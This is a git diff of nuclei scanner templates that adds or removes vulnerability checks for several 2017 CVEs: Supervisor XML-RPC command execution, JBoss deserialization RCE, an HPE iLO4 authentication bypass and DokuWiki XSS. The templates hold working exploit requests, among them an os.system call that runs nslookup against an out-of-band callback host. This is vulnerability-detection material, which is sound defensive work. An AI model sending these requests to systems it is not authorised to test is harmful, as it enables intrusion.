- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- part: header
diff --git a/nuclei-templates/CVE-2017/CVE-2017-11610.yaml b/nuclei-templates/CVE-2017/CVE-2017-11610.yaml
deleted file mode 100644
index c0cead3284..0000000000
--- a/nuclei-templates/CVE-2017/CVE-2017-11610.yaml
+++ /dev/null
@@ -1,56 +0,0 @@
-id: CVE-2017-11610
-
-info:
- name: Supervisor XMLRPC Exec
- author: notnotnotveg
- severity: high
- description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.
- reference:
- - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
- - https://nvd.nist.gov/vuln/detail/CVE-2017-11610
- - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/
- - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2017-11610
- cwe-id: CWE-276
- metadata:
- shodan-query: http.title:"Supervisor Status"
- tags: cve,cve2017,rce,supervisor,oast,xmlrpc
-
-requests:
- - raw:
- - |
- POST /RPC2 HTTP/1.1
- Host: {{Hostname}}
- Accept: text/xml
- Content-type: text/xml
-
-
- supervisor.supervisord.options.warnings.linecache.os.system
-
-
- nslookup {{interactsh-url}}
-
-
-
-
- matchers-condition: and
- matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "dns"
-
- - type: word
- part: header
- words:
- - "text/xml"
-
- - type: word
- part: body
- words:
- - ""
- - ""
- condition: and
diff --git a/nuclei-templates/CVE-2017/CVE-2017-12149.yaml b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml
new file mode 100644
index 0000000000..4196407987
--- /dev/null
+++ b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml
@@ -0,0 +1,57 @@
+id: CVE-2017-12149
+
+info:
+ name: Jboss Application Server - Remote Code Execution
+ author: fopina,s0obi
+ severity: critical
+ description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.
+ reference:
+ - https://chowdera.com/2020/12/20201229190934023w.html
+ - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
+ - https://bugzilla.redhat.com/show_bug.cgi?id=1486220
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2017-12149
+ cwe-id: CWE-502
+ tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss
+ metadata:
+ max-request: 3
+
+http:
+ - raw:
+ - |
+ POST /invoker/JMXInvokerServlet/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/octet-stream
+
+ {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
+
+ - |
+ POST /invoker/EJBInvokerServlet/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/octet-stream
+
+ {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
+
+ - |
+ POST /invoker/readonly HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/octet-stream
+
+ {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "ClassCastException"
+
+ - type: status
+ status:
+ - 200
+ - 500
+
+# Enhanced by mp on 2022/05/11
diff --git a/nuclei-templates/CVE-2017/CVE-2017-12542.yaml b/nuclei-templates/CVE-2017/CVE-2017-12542.yaml
new file mode 100644
index 0000000000..9bd0b6ab7e
--- /dev/null
+++ b/nuclei-templates/CVE-2017/CVE-2017-12542.yaml
@@ -0,0 +1,43 @@
+id: CVE-2017-12542
+
+info:
+ name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
+ author: pikpikcu
+ severity: critical
+ description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/44005
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+ - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
+ - https://www.exploit-db.com/exploits/44005/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2017-12542
+ tags: cve,cve2017,ilo4,hpe,auth-bypass
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/rest/v1/AccountService/Accounts"
+
+ headers:
+ Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "iLO User"
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/11
diff --git a/nuclei-templates/CVE-2017/CVE-2017-12583.yaml b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml
deleted file mode 100644
index 4d088e27f0..0000000000
--- a/nuclei-templates/CVE-2017/CVE-2017-12583.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: CVE-2017-12583
-
-info:
- name: DokuWiki - Cross-Site Scripting
- author: DhiyaneshDK
- severity: medium
- description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
- reference:
- - https://github.com/splitbrain/dokuwiki/issues/2061
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12583
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2017-12583
- cwe-id: CWE-79
- metadata:
- shodan-query: http.title:"DokuWiki"
- tags: cve,cve2017,xss,dokuwiki
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at= |